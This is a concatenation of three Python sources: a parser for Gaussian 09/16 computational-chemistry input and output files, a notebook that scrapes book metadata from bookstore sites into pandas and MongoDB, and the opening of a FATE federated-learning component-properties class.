            Block = []
            # Ask the Reader until a "start line" is found
            while not start:
                ReachedEOF, line = next(Reader)
                if ReachedEOF:
                    yield EOF, ''
                else:
                    start = re_enter.findall(line)
                    if not start:
                        Block.append(line)
                    else:  # Store the number of the Link
                        number = int(start[0])
                        # When found, yield any accumulated text as an
                        # "InterBlock" and start the real Block with this line
                        if Block:
                            yield interblock, ''.join(Block)
                            Block = [line, ]
                        else:
                            Block.append(line)
            # Now that the start of the Link has been found, accumulate lines
            # until the end or termination line is found
            end = False
            while not end:
                ReachedEOF, line = next(Reader)
                if ReachedEOF:
                    # At EOF: check the last few lines for a termination
                    # message before declaring the block unfinished
                    Target = Block[-10:] + [line, ]
                    terminated = re_termination.findall(''.join(Target))
                    if terminated:
                        Block.append(line)
                        break
                    else:
                        yield EOF, ''
                else:
                    end = re_exit.findall(line)
                    Block.append(line)
            # when the end is found, yield the type token and the block
            yield number, ''.join(Block)

    def BlockHandler(self):
        """ Coroutine. Receives a block, chooses the parser and parses it """
        # Initialization
        Parsers = self._Parsers
        CurrentJob = self.InternalJobs[-1]
        BlockType, Block = yield 'Initialization done'
        while True:
            Parser = Parsers[BlockType]
            Link = Parser(Block)
            # Only a Link 1 can announce the start of a new InternalJob
            if Link.number == 1:
                new_InternalJob = Link.info.new_InternalJob
            else:
                new_InternalJob = False
            if new_InternalJob:
                New = InternalJob()
                self.InternalJobs.append(New)
                CurrentJob = self.InternalJobs[-1]
                CurrentJob.append(Link)
                CurrentJob.guess_info()
            else:
                CurrentJob.append(Link)
            BlockType, Block = yield
class InternalJob(object):
    """Gaussian 09/16 InternalJob parent class, if any special type of Job
    requires different parsing it should be a subclass of this one.

    Parameters
    ----------
    number : int
        ordinal number of the InternalJob (the default is None).

    Attributes
    ----------
    type
        string identifier for the job.
    Links
        List of the different Links that belong to the InternalJob.
    number
    """

    def __init__(self, number=None):
        self.number = number
        self.type = None
        self.Links = []

    def __repr__(self):
        cls = type(self).__name__
        if self.number is None:
            return f'<{cls} Created but Empty>'
        else:
            return f'<{cls} {self.number}>'

    def __str__(self):
        return f'Internal Job {self.number}: {self.type}'

    def __getitem__(self, index):
        return self.Links[index]

    def __len__(self):
        return len(self.Links)

    def append(self, Link):
        """Append `Link`, rejecting anything that is not a LinkJob."""
        if not isinstance(Link, LinkJob):
            # BUG FIX: the original used f'{x:!r}', which treats '!r' as a
            # *format spec* and raises a formatting error instead of the
            # intended TypeError message; the conversion is '{x!r}'.
            raise TypeError(f'{Link!r} is not of class {LinkJob!r}')
        self.Links.append(Link)

    def guess_info(self):
        """ Guesses the number and type attributes of itself using the stored
        Links."""
        if self.Links:
            starters = (link for link in self.Links if link.number == 1)
            try:
                info = next(starters).info
            except (AttributeError, StopIteration):
                # No Link 1 present, or it carries no info: keep defaults
                pass
            else:
                self.number = info.number
                self.type = info.type

    def clean(self):
        """Removes all the Empty Link instances within Links."""
        # In-place slice assignment so external references to Links stay valid
        self.Links[:] = [link for link in self.Links if link.text]

    def get_links(self, *LinkIds):
        """Wrapper Method to get a list of Links with certain Ids.

        Parameters
        ----------
        *LinkIds : int
            Integers that correspond to the type of links to be returned.

        Returns
        -------
        list
            List of Link Objects ordered by appearance in the file and filtered
            by Link Number.
        """
        return [Link for Link in self.Links if Link.number in LinkIds]
class GaussianInFile(object):
    """
    Gaussian 09/16 .in file parent class, if any special type of input
    requires different processing it should be a subclass of this one.

    Parameters
    ----------
    file : io.TextIOBase or str
        File instance (Result of open(filename,'r')) or valid filename.

    Attributes
    ----------
    preprocessing : dict
        Dictionary in which each key corresponds to a certain Link0 keyword
    commandline : dict
        Dictionary that contains the information of how the calculation
        will be carried out.
    title : str
        title of the calculation.
    method : str
        If it cannot be recognized in the command line it will be empty.
    basis : str
        If it cannot be recognized in the command line it will be empty.
    spin : int
    charge : int
    geometry : str-ish
        It should be able to write the text block of an input file upon calling
        str(geometry)
    tail : list
        List of str in which each should be separated from the others by a
        single blank line in the input file.
    structure : str
        A string holding the structure of the input file. Used to write new
        Input files.
    nprocs : int
        property to easily access and change the preprocessing['nprocshared'] value
    mem : int
        property to easily access and change the preprocessing['mem'] value
    """

    def __init__(self, file):
        if isinstance(file, io.TextIOBase):
            self._file = file
        else:
            # 'a+' so a missing file is created instead of raising
            self._file = open(file, 'a+')
        if self._file.tell() != 0:
            self._file.seek(0)
        self._txt = ''
        self.preprocessing = dict()  # In the G16 Manual "Link 0 Commands"
        self.commandline = dict()    # In the G16 Manual "Route Section"
        self.title = ''
        self._method = ''
        self._basis = ''
        self.spin = 1
        self.charge = 0
        self.geometry = ''           # In the G16 Manual "Molecule Specification"
        self.tail = []               # In the G16 Manual "Optional additional sections"
        self.structure = '{preprocessing}\n{commandline}\n\n'
        self.structure += '{title}\n\n'
        self.structure += '{charge} {spin}\n{geometry}\n\n'
        self.structure += '{tail}\n\n'

    def __repr__(self):
        # (removed the unused `size = len(self)`, which rendered the whole
        # file text only to discard it)
        cls = type(self).__name__
        file = self._file.name.split("/")[-1]
        return f'<{cls}({file})>'

    def __str__(self):
        # str repr of the preprocessing
        preprocessing = []
        for key, val in self.preprocessing.items():
            if val:
                Aux = f'%{key}={val}'
            else:
                Aux = f'%{key}'
            preprocessing.append(Aux)
        # str repr of the commandline
        commandline = ['#p', ]
        for key, val in self.commandline.items():
            if val and (len(val) == 1):
                Aux = f"{key}={','.join(val)}"
            elif val:
                Aux = f"{key}=({','.join(val)})"
            else:
                Aux = f"{key}"
            commandline.append(Aux)
        # Prepare to format as str
        kwargs = dict(preprocessing='\n'.join(preprocessing),
                      commandline=' '.join(commandline),
                      title=self.title,
                      charge=self.charge,
                      spin=self.spin,
                      geometry=str(self.geometry),
                      tail='\n\n'.join(self.tail))
        return self.structure.format(**kwargs)

    def __len__(self):
        return len(str(self))

    def __enter__(self):
        ''' Wrapper to have similar behaviour to "_io.TextIOWrapper" '''
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        ''' Wrapper to have similar behaviour to "_io.TextIOWrapper" '''
        return self._file.__exit__(exc_type, exc_value, traceback)

    @property
    def method(self):
        return self._method

    @method.setter
    def method(self, other):
        self.change_method(other)

    @property
    def basis(self):
        return self._basis

    @basis.setter
    def basis(self, other):
        self.change_basis(other)

    @property
    def nprocs(self):
        return self.preprocessing.get('nprocshared', None)

    @nprocs.setter
    def nprocs(self, other):
        self.preprocessing['nprocshared'] = other

    @property
    def mem(self):
        return self.preprocessing.get('mem', None)

    @mem.setter
    def mem(self, other):
        self.preprocessing['mem'] = other

    def read(self):
        """
        Reads the file and populates the appropriate attributes.
        """
        txt = [line.strip() for line in self._file]
        if not txt:
            raise EOFError('Attempting to read an empty or non-existent file')
        if txt[-1]:  # If the file ends without a blank line add it
            txt.append('')
        if txt[-2]:  # If the file ends without two blank lines add one
            txt.append('')
        self._txt = '\n'.join(txt)
        # Indices of blank lines (section separators)
        bins = [i for i, line in enumerate(txt) if not line]
        # Ensure that if the title is empty, the bins are not including it:
        # drop indices that sit in the middle of a run of blank lines
        bins = [i for i in bins if not set((i-1, i, i+1)).issubset(set(bins))]
        stop = bins[0]
        header = iter(txt[:stop])
        preprocessing = []
        for line in header:
            if line.startswith("%"):
                preprocessing.append(line.lstrip("%"))
            elif line.startswith("#"):
                break
        self.parse_preprocessing(preprocessing)
        # Read the command line assuming that the keywords cannot be in a
        # 'chopped in half' version between lines.  `line` still holds the
        # '#'-line where the previous loop broke.
        commandline = [line.split(), ]
        for line in header:
            commandline.append(line.split())
        self.parse_commandline(commandline)
        # Read the Title Section
        start = bins[0] + 1
        stop = bins[1]
        title = [line for line in txt[start:stop]]
        self.title = '\n'.join(title)
        # Read charge and spin
        charge, spin = txt[stop+1].split()
        self.charge, self.spin = int(charge), int(spin)
        # Now we read the geometry
        start = stop + 1
        stop = bins[2]
        geometry = [line for line in txt[start+1:stop]]
        self.parse_geometry(geometry)
        # Now we read the Tail
        tail = []
        if len(txt) > stop + 1:  # if it exists
            tail = [line for line in txt[stop:]]
        self.parse_tail(tail)

    def close(self):
        """Alias to file.close for consistency with the io.TextIOBase class"""
        self._file.close()

    def write(self, filepath=None):
        """
        Writes the File object to a File. If a filepath is provided it will
        write to that filepath otherwise it will attempt to write to the path
        provided in the initialization.

        Parameters
        ----------
        filepath : str
            A valid filepath.
        """
        self._txt = str(self)
        if filepath is None:
            # Write to self._file
            self._file.write(self._txt)
        else:
            # open the file, write and close the file
            with open(filepath, 'w') as F:
                F.write(self._txt)

    # Helper Functions for the read function to encapsulate different behaviours
    def parse_preprocessing(self, lines):
        """
        Parses the lines that contain the Link 0 keywords and transforms them
        into a dictionary representation.

        Parameters
        ----------
        lines : list
            list of strings previously stripped. Empty lines will be ignored.
        """
        # Link 0 lines come as '%kwd=value' or bare '%kwd'; str.partition
        # handles both shapes (a missing '=' yields an empty value) and keeps
        # everything after the first '=' as the value.
        # BUG FIX: the original did `key,val = Aux,''` for bare keywords,
        # which made `key` the whole *list* returned by split() and crashed
        # with 'unhashable type' on dictionary insertion.
        for line in lines:
            if not line:
                continue
            key, _, val = line.partition('=')
            self.preprocessing[key] = val

    def parse_commandline(self, lines):
        """
        Parses the lines that contain the calculation commands keywords and
        transforms them into a dictionary representation.

        Parameters
        ----------
        lines : list
            list of strings previously stripped. Empty lines will be ignored.
        """
        # the first line contains the "#p" marker; remove it
        start = lines[0][1:]
        others = [token for token in chain(*lines[1:])]
        method_found = False
        basis_found = False
        for item in chain(start, others):
            if is_method(item) and not method_found:
                method_found = True
                self._method = item
                key, val = item, []
            elif is_basis(item) and not basis_found:
                basis_found = True
                self._basis = item
                key, val = item, []
            elif is_basis(item) or is_method(item):
                # A second method/basis keyword: keep it as a plain keyword
                print('2 Basis or methods found \n')
                print(f'taking {item} as a normal keyword')
                key, val = item, []
            else:
                Aux = item.split('=', 1)
                if len(Aux) == 1:
                    key, val = Aux[0], []
                else:
                    key, val = Aux
            # Normalize the value: 'opt=(a,b)' -> ['a','b'] ; 'opt=a' -> ['a']
            if val and val.startswith('('):
                val = val[1:-1].split(',')
            elif val:
                val = [val, ]
            previously_stored = key in self.commandline
            has_suboptions = bool(self.commandline.get(key, False))
            if not previously_stored:
                self.commandline[key] = val
            elif not has_suboptions:
                self.commandline[key].extend(val)
            else:
                # BUG FIX: the original used `set(a) + set(b)`, but sets do
                # not support '+'; union is the '|' operator.
                merged = set(self.commandline[key]) | set(val)
                self.commandline[key] = list(merged)

    def parse_geometry(self, lines):
        """Parses each line that contains 'Atom x y z' in an appropriate form
        and saves it to self.geometry

        Parameters
        ----------
        lines : list
            list of strings previously stripped. Should not contain empty lines
        """
        # This function is currently set up to only get the geometry as-is.
        # In the future it should include the logic to transform between
        # coordinate specifications (zmatrix, xyz, internal) to enforce a
        # certain geometry or geometry class.
        self.geometry = '\n'.join(lines)

    def parse_tail(self, lines):
        """Chops the set of lines into different blocks of text using the
        blank lines as separators and stores the blocks in self.tail.

        Parameters
        ----------
        lines : list
            list of strings previously stripped.
        """
        Aux = []
        self.tail = []
        for line in lines:
            if line:
                Aux.append(line)
            elif Aux:
                # Blank line closes the current block
                self.tail.append('\n'.join(Aux))
                Aux = []
            else:
                pass
        else:
            # File did not end with a blank line: flush the last block
            if Aux:
                self.tail.append('\n'.join(Aux))
                print('Parsed an input file withouth blank line ending')  # sic

    # Modifying functions
    def pop_chk(self, default=None):
        """
        Removes the chk from the file, returns 'default' if the chk was not
        included already
        """
        if default is not None:
            return self.preprocessing.pop('chk', default)
        else:
            # No default: propagate KeyError if 'chk' was never set
            return self.preprocessing.pop('chk')

    def add_chk(self, name=None):
        """
        Adds the chk to the file, with the specified name. If none is provided
        defaults to the file name ended in .chk
        """
        if name is None:
            try:
                name = self._file.name
            except AttributeError:
                name = self._file.split('/')[-1]
            name = name.rsplit('.')[0] + '.chk'
        else:
            if not name.endswith('.chk'):
                name = name + '.chk'
        self.preprocessing['chk'] = name

    def change_method(self, method):
        """Changes appropriately the method of the calculation. Running
        self.method = method makes a call to this function.

        Parameters
        ----------
        method : str
            A string representation of a valid method

        Raises
        -------
        NotImplementedError
            If the method is not within the registered methods keywords
        """
        if not is_method(method):
            raise NotImplementedError(f'method {method} not implemented')
        key = self._method
        _ = self.commandline.pop(key, None)  # Used to ensure deletion of the key
        self._method = method
        self.commandline[method] = ''

    def change_basis(self, basis):
        """Changes appropriately the basis of the calculation. Running
        self.basis = basis makes a call to this function.

        Parameters
        ----------
        basis : str
            A string representation of a valid basis if specified in the
            command line.

        Raises
        -------
        NotImplementedError
            If the basis is not within the registered basis keywords
        """
        if not is_basis(basis):
            raise NotImplementedError(f'basis {basis} not implemented')
        key = self._basis
        _ = self.commandline.pop(key, None)  # Used to ensure deletion of the key
        self._basis = basis
        self.commandline[basis] = ''
# TODO: Implement a class to read and manipulate the basis functions in the tail
# class BasisTail(object), whose str function returns things as it should and
# that can have a linked input file object, so that modifying the basis of this
# object will modify the input file basis in certain cases.
|
#!/usr/bin/env python
# coding: utf-8
# <b>Python Scraping of Book Information</b>
# In[1]:
# NOTE(review): these cells are a Jupyter-notebook export — `get_ipython()`
# only exists inside an IPython session; running this file as a plain Python
# script will raise NameError here.  The three cells shell out to pip to
# install the scraping dependencies (bs4, splinter, webdriver_manager).
get_ipython().system('pip install bs4')
# In[2]:
get_ipython().system('pip install splinter')
# In[3]:
get_ipython().system('pip install webdriver_manager')
# In[1]:
# Setup splinter
from splinter import Browser
from bs4 import BeautifulSoup
from webdriver_manager.chrome import ChromeDriverManager
import time
import pandas as pd
import requests
# In[ ]:
# In[42]:
# executable_path = {'executable_path': ChromeDriverManager().install()}
# browser = Browser('chrome', **executable_path, headless=False)
# url = 'http://books.toscrape.com/'
# browser.visit(url)
# for x in range(50):
# html = browser.html
# soup = BeautifulSoup(html, 'html.parser')
# articles = soup.find_all('article', class_='product_pod')
# for article in articles:
# h3 = article.find("h3")
# link = h3.find("a")
# href = link["href"]
# title = link["title"]
# print("----------")
# print(title)
# url = "http://books.toscrape.com/" + href
# browser.visit(url)
# try:
# current_page = current_page + 1
# web_page_url = f"https://books.toscrape.com/catalogue/category/books_1/page-{current_page}.html"
# browser.visit(web_page_url)
# browser.links.find_by_partial_text("next").click()
# print('It worked')
# except:
# print("Scraping Complete")
# browser.quit()
# In[57]:
# executable_path = {'executable_path': ChromeDriverManager().install()}
# browser = Browser('chrome', **executable_path, headless=False)
# pageNumber= pageNumber + 1
# url = 'http://books.toscrape.com/'
# pageUrl = f'http://books.toscrape.com/catalogue/page-{pageNumber}.html'
# browser.visit(url)
# html = browser.html
# soup = BeautifulSoup(html, 'html.parser')
# for x in range(20):
# html = browser.html
# soup = BeautifulSoup(html, 'html.parser')
# articles = soup.find_all('article', class_='product_pod')
# for article in articles:
# h3 = article.find("h3")
# link = h3.find("a")
# href = link["href"]
# title = link["title"]
# print("----------")
# print(title)
# #time.sleep(1)
# url = "http://books.toscrape.com/" + href
# browser.visit(url)
# try:
# browser.visit(pageUrl)
# browser.links.find_by_partial_text("next").click()
# except:
# print("Scraping Complete")
# browser.quit()
# In[2]:
# Walk the first two catalogue pages of books.toscrape.com and open every
# book's detail page in the automated browser, printing each title.
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
pageUrl = ""
for page_number in range(1, 3):
    # Page 1 lives at the site root; later pages follow the catalogue pattern.
    if page_number == 1:
        pageUrl = f"https://books.toscrape.com/index.html"
    else:
        pageUrl = f'https://books.toscrape.com/catalogue/page-{page_number}.html'
    print(pageUrl)
    browser.visit(pageUrl)
    page_soup = BeautifulSoup(browser.html, 'html.parser')
    for product in page_soup.find_all('article', class_='product_pod'):
        anchor = product.find("h3").find("a")
        print("----------")
        print(anchor["title"])
        # Visit the individual book page before moving on to the next product.
        browser.visit("http://books.toscrape.com/" + anchor["href"])
browser.quit()
# In[97]:
#Proof of concept using books.toscrape.com
# Same walk as above, but additionally fetches each detail page with
# requests and parses its product-information <table> via pd.read_html.
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
pageUrl = ""
for i in range(1, 2):
    if (i == 1):
        pageUrl = f"https://books.toscrape.com/index.html"
    else:
        pageUrl = f'https://books.toscrape.com/catalogue/page-{i}.html'
    print(pageUrl)
    browser.visit(pageUrl)
    html = browser.html
    soup = BeautifulSoup(html, 'html.parser')
    articles = soup.find_all('article', class_='product_pod')
    for article in articles:
        h3 = article.find("h3")
        link = h3.find("a")
        href = link["href"]
        title = link["title"]
        print("----------")
        print(title)
        #time.sleep(1)
        url = "http://books.toscrape.com/" + href
        browser.visit(url)
        # detail page is fetched a second time with requests for parsing
        res = requests.get(url)
        soup = BeautifulSoup(res.content, 'lxml')
        table = soup.find_all('table')[0]
        df = pd.read_html(str(table))[0]
        print(df)
browser.quit()
# In[20]:
# Scrape listing pages 50, 75 and 100 of books.toscrape.com, collecting the
# product-information <table> from every book's detail page into
# table_on_page.
# BUG FIX: the original iterated `list(50, 75, 100)`, which raises
# TypeError (list() accepts at most one argument); a list literal is meant.
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
pageUrl = ""
table_of_tables = []
for i in [50, 75, 100]:
    table_on_page = []
    if (i == 25):
        # never true for the pages above; kept for parity with other cells
        pageUrl = f"https://books.toscrape.com/index.html"
    else:
        pageUrl = f'https://books.toscrape.com/catalogue/page-{i}.html'
    print(pageUrl)
    browser.visit(pageUrl)
    html = browser.html
    soup = BeautifulSoup(html, 'html.parser')
    articles = soup.find_all('article', class_='product_pod')
    for article in articles:
        h3 = article.find("h3")
        link = h3.find("a")
        href = link["href"]
        title = link["title"]
        print("----------")
        print(title)
        #time.sleep(1)
        url = "http://books.toscrape.com/" + href
        browser.visit(url)
        res = requests.get(url)
        soup = BeautifulSoup(res.content, 'lxml')
        table = soup.find_all('table')[0]
        table_on_page.append(table)
        # table_of_tables.append(table_on_page)
        df = pd.read_html(str(table))[0]
        print(df)
browser.quit()
# In[61]:
# In[48]:
# Persist the scraped per-book tables, then reload them for cleaning.
df = pd.DataFrame(table_on_page)
df.to_csv('books2scrape.csv')
# In[52]:
df_to_clean = pd.read_csv('books2scrape.csv')
# In[64]:
# Drop the pandas index column plus the even-numbered columns
# (presumably the <th> label cells; the odd columns carry values —
# TODO confirm against the CSV).
df_columns_cleaned = df_to_clean.drop(columns=['Unnamed: 0', '0', '2', '4', '6', '8', '10', '12', '14'])
# In[71]:
df_columns_cleaned.columns
# In[66]:
df_columns_cleaned.head()
# In[78]:
# Strip residual HTML tags/newlines left over from serializing the <table>
# rows into CSV cells. A loop over the column names replaces the seven
# hand-copied .str.replace lines of the original (same columns, same order).
html_chars = ["<tr>", "\n", "</th>", "<th>", "<td>", "</td>",
              "</tr>"]
for char in html_chars:
    for col in ['1', '3', '5', '7', '9', '11', '13']:
        df_columns_cleaned[col] = df_columns_cleaned[col].str.replace(char, ' ')
# In[79]:
df_columns_cleaned
# In[290]:
# executable_path = {'executable_path': ChromeDriverManager().install()}
# browser = Browser('chrome', **executable_path, headless=False)
# pageUrl=""
# table_of_tables = []
# for i in range(1):
# table_on_page = []
# pageUrl = f'ttps://www.hpb.com/books/best-sellers/784-classics?&size=350&&&'
# print(pageUrl)
# browser.visit(pageUrl)
# html = browser.html
# soup = BeautifulSoup(html, 'html.parser')
# articles = soup.find_all('article', class_='product_pod')
# for article in articles:
# time.sleep(randint(1,3))
# section = article.find("section")
# link = section.find("a")
# href = link["href"]
# print(href)
# title = link["title"]
# print("----------")
# print(title)
# time.sleep(randint(1,3))
# url = href
# browser.visit(url)
# res=requests.get(url)
# time.sleep(randint(3,5))
# soup = BeautifulSoup(res.content,'lxml')
# table = soup.find_all('table')[0]
# table_on_page.append(table)
# # table_of_tables.append(table_on_page)
# df = pd.read_html(str(table))[0]
# print(df)
# browser.quit()
# In[198]:
#https://stackoverflow.com/questions/31064981/python3-error-initial-value-must-be-str-or-none-with-stringio
import io
# In[267]:
#grab data from https://citylights.com/greek-roman/
# Crawl the six listing pages of the Greek/Roman section, pulling the
# publication-details text block from each title's detail page.
import random
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
table_of_data = []
pageUrl = ""
for i in range(1, 7):
    data_on_page = []
    if (i == 1):
        pageUrl = f"https://citylights.com/greek-roman/"
    else:
        pageUrl = f'https://citylights.com/greek-roman/page/{i}/'
    print(pageUrl)
    time.sleep(1)
    browser.visit(pageUrl)
    html = browser.html
    soup = BeautifulSoup(html, 'html.parser')
    #https://stackoverflow.com/questions/52842778/find-partial-class-names-in-spans-with-beautiful-soup
    articles = soup.find_all('li', attrs={'class': lambda e: e.startswith('product type-product post') if e else False})
    for article in articles:
        time.sleep(1)
        link = article.find('a')
        href = link["href"]
        print("----------")
        print(href)
        url = href
        browser.visit(url)
        # BUG FIX: only the random *module* is imported, so the bare
        # randint(...) call of the original raised NameError.
        time.sleep(random.randint(1, 2))
        res = requests.get(url)
        soup = BeautifulSoup(res.content, 'lxml')
        data = soup.find_all('div', attrs={'class': 'detail-text mb-50'})[0].get_text()
        data_on_page.append(data)
    table_of_data.append(data_on_page)
df = pd.DataFrame(table_of_data)[0]
print(data)
browser.quit()
# In[268]:
# Persist and clean the scraped Greek/Roman publication details.
df.to_csv('greek-roman.csv')
# In[269]:
df_greek_roman_to_clean = pd.read_csv('greek-roman.csv')
df_greek_roman_to_clean_columns = df_greek_roman_to_clean.drop(columns=['Unnamed: 0'])
# In[270]:
df_greek_roman_to_clean_columns
# In[271]:
# Each scraped detail block is one newline/tab separated string; split it
# into its component fields.
df_greek_roman_to_clean_columns_split = df_greek_roman_to_clean_columns['0'].str.split("\n\t")
# In[272]:
df_greek_roman = df_greek_roman_to_clean_columns_split.to_list()
column_names = ['0', 'ISBN-10', 'ISBN-13', 'Publisher', 'Publish Date', 'Dimensions']
new_greek_roman_df = pd.DataFrame(df_greek_roman, columns=column_names)
# In[273]:
clean_greek_roman_df = new_greek_roman_df.drop(columns=['0', 'Dimensions'])
# In[274]:
clean_greek_roman_df.head()
# In[275]:
# Scrub leftover markup/whitespace; a column loop replaces the four
# hand-copied .str.replace statements of the original (same effect).
html_chars = ["<tr>", "\n", "</th>", "<th>", "<td>", "</td>",
              "</tr>", '\t']
for char in html_chars:
    for col in ['ISBN-10', 'ISBN-13', 'Publisher', 'Publish Date']:
        clean_greek_roman_df[col] = clean_greek_roman_df[col].str.replace(char, ' ')
# In[276]:
pd.set_option("max_colwidth", 1000)
clean_greek_roman_df.head()
# In[277]:
clean_greek_roman_df.to_csv('greek-roman-clean.csv')
# In[ ]:
# In[279]:
# grab data from https://citylights.com/asian/
# Crawl four listing pages of the Asian-classics section, collecting the
# publication-details text from each title's detail page.
import random
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
table_of_data = []
pageUrl = ""
for i in range(1, 5):
    data_on_page = []
    if (i == 1):
        pageUrl = f"https://citylights.com/asian/"
    else:
        pageUrl = f'https://citylights.com/asian/page/{i}/'
    print(pageUrl)
    time.sleep(1)
    browser.visit(pageUrl)
    html = browser.html
    soup = BeautifulSoup(html, 'html.parser')
    #https://stackoverflow.com/questions/52842778/find-partial-class-names-in-spans-with-beautiful-soup
    articles = soup.find_all('li', attrs={'class': lambda e: e.startswith('product type-product post') if e else False})
    for article in articles:
        # BUG FIX: only `import random` is in scope, so the bare randint()
        # call of the original raised NameError.
        time.sleep(random.randint(1, 2))
        link = article.find('a')
        href = link["href"]
        print("----------")
        print(href)
        url = href
        browser.visit(url)
        time.sleep(1)
        res = requests.get(url)
        soup = BeautifulSoup(res.content, 'lxml')
        data = soup.find_all('div', attrs={'class': 'detail-text mb-50'})[0].get_text()
        data_on_page.append(data)
    table_of_data.append(data_on_page)
# BUG FIX: build the frame from all pages (table_of_data) as the
# greek-roman cell does; the original used data_on_page (last page only).
df = pd.DataFrame(table_of_data)[0]
print(data)
browser.quit()
# In[280]:
# Persist and clean the scraped Asian-classics publication details.
df.to_csv('asian.csv')
# In[281]:
df_asian_classics_to_clean = pd.read_csv('asian.csv')
df_asian_classics_to_clean_columns = df_asian_classics_to_clean.drop(columns=['Unnamed: 0'])
# In[282]:
df_asian_classics_to_clean_columns
# In[283]:
# Split each newline/tab separated detail string into its fields.
df_asian_classics_to_clean_columns_split = df_asian_classics_to_clean_columns['0'].str.split("\n\t")
# In[284]:
df_asian_classics = df_asian_classics_to_clean_columns_split.to_list()
column_names = ['0', 'ISBN-10', 'ISBN-13', 'Publisher', 'Publish Date', 'Dimensions']
new_asian_classics_df = pd.DataFrame(df_asian_classics, columns=column_names)
# In[285]:
clean_asian_classics_df = new_asian_classics_df.drop(columns=['0', 'Dimensions'])
# In[286]:
clean_asian_classics_df.head()
# In[287]:
# Scrub leftover markup; a column loop replaces the four hand-copied
# .str.replace statements of the original (same effect).
html_chars = ["<tr>", "\n", "</th>", "<th>", "<td>", "</td>",
              "</tr>", '\t']
for char in html_chars:
    for col in ['ISBN-10', 'ISBN-13', 'Publisher', 'Publish Date']:
        clean_asian_classics_df[col] = clean_asian_classics_df[col].str.replace(char, ' ')
# In[288]:
pd.set_option("max_colwidth", 1000)
clean_asian_classics_df.head()
# In[ ]:
# In[ ]:
# In[ ]:
# In[391]:
greek_roman_clean_for_combine_df = pd.read_csv('greek-roman-clean.csv')
# In[392]:
greek_roman_clean_for_combine_df
# In[402]:
# BUG FIX: str.lstrip('ISBN-10: ') strips any leading run of the characters
# {'I','S','B','N','-','1','0',':',' '} — a character *set*, not a prefix —
# which also eats leading digits of the ISBN itself. Remove the label
# explicitly, then mirror the books_df normalization (leading zeros
# stripped) so the later merge on 'ISBN-10' still matches.
greek_roman_clean_for_combine_df['ISBN-10'] = greek_roman_clean_for_combine_df['ISBN-10'].map(
    lambda x: x.replace('ISBN-10:', '').strip().lstrip('0'))
greek_roman_clean_for_combine_df
# In[403]:
greek_roman_clean_for_combine_df.dtypes
# In[382]:
# In[ ]:
# In[404]:
greek_roman_clean_for_combine_df
# In[ ]:
# In[ ]:
# In[346]:
#https://stackoverflow.com/questions/18039057/python-pandas-error-tokenizing-data
# NOTE(review): error_bad_lines was deprecated in pandas 1.3 and removed in
# 2.0 (use on_bad_lines='skip'); kept as-is for the pinned environment.
books_df = pd.read_csv('Data/books.csv', error_bad_lines=False)
# In[347]:
books_df.head()
# In[ ]:
# In[352]:
#change column names
# Align the Kaggle-style column names with the scraped data for merging.
books_columns_df = books_df.rename(columns={"isbn": "ISBN-10", "isbn13": "ISBN-13"})
# In[397]:
books_columns_df.dtypes
# In[405]:
# Normalize ISBNs by stripping leading zeros before the merge.
books_columns_df['ISBN-10'] = books_columns_df['ISBN-10'].map(lambda x: x.lstrip('0'))
# In[406]:
books_columns_df
# In[ ]:
# In[ ]:
# In[ ]:
# In[421]:
# Outer-join the Kaggle book data with the scraped Greek/Roman data on the
# normalized ISBN-10 key.
merged_df = books_columns_df.merge(greek_roman_clean_for_combine_df, on='ISBN-10', how='outer')
# In[425]:
merged_df.tail()
# In[423]:
# keep only rows that matched on both sides
merged_drop_nan_df = merged_df.dropna()
# In[424]:
merged_drop_nan_df
# In[427]:
# Convert to list-of-dict records for MongoDB insertion.
data1 = books_df.to_dict(orient='records')
data1
# In[428]:
data2 = greek_roman_clean_for_combine_df.to_dict(orient='records')
data2
# In[431]:
#books_df
#greek_roman_clean_for_combine_df
# Load step of the ETL: insert both record sets into a local MongoDB.
import pymongo
import pandas as pd
import json
connection_string = "mongodb://localhost:27017"
client = pymongo.MongoClient(connection_string)
db = client["Project2"]
db.Books.insert_many(data1)
db.Greek_Roman.insert_many(data2)
print("ETL Complete")
# In[ ]:
# In[ ]:
|
<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from fate_arch.computing import is_table
from federatedml.util import LOGGER
class RunningFuncs(object):
    """Ordered schedule of callables with per-step result-handling flags."""

    def __init__(self):
        self.todo_func_list = []
        self.todo_func_params = []
        self.save_result = []
        self.use_previews_result = []

    def add_func(self, func, params, save_result=False, use_previews=False):
        """Append one step: the callable, its params, and its flags."""
        for target, value in ((self.todo_func_list, func),
                              (self.todo_func_params, params),
                              (self.save_result, save_result),
                              (self.use_previews_result, use_previews)):
            target.append(value)

    def __iter__(self):
        """Yield (func, params, save_result, use_previews) per step, in order."""
        yield from zip(self.todo_func_list, self.todo_func_params,
                       self.save_result, self.use_previews_result)
class DSLConfigError(ValueError):
    """Raised when the DSL component configuration is inconsistent."""
class ComponentProperties(object):
    """Holds a component's run-mode flags and data/model input topology.

    Populated from the component parameters and DSL args; used to build the
    RunningFuncs schedule deciding which model methods run in which order.
    """

    def __init__(self):
        # run-mode switches
        self.need_cv = False
        self.need_run = False
        self.need_stepwise = False
        # model inputs present in the DSL args
        self.has_model = False
        self.has_isometric_model = False
        # data inputs present in the DSL args
        self.has_train_data = False
        self.has_eval_data = False
        self.has_validate_data = False
        self.has_test_data = False
        self.has_normal_input_data = False
        # federation topology info
        self.role = None
        self.host_party_idlist = []
        self.local_partyid = -1
        self.guest_partyid = -1
        # input row counts, filled in extract_input_data
        self.input_data_count = 0
        self.input_eval_data_count = 0

    def parse_component_param(self, component_parameters, param):
        """Populate run-mode flags and party info from the component param.

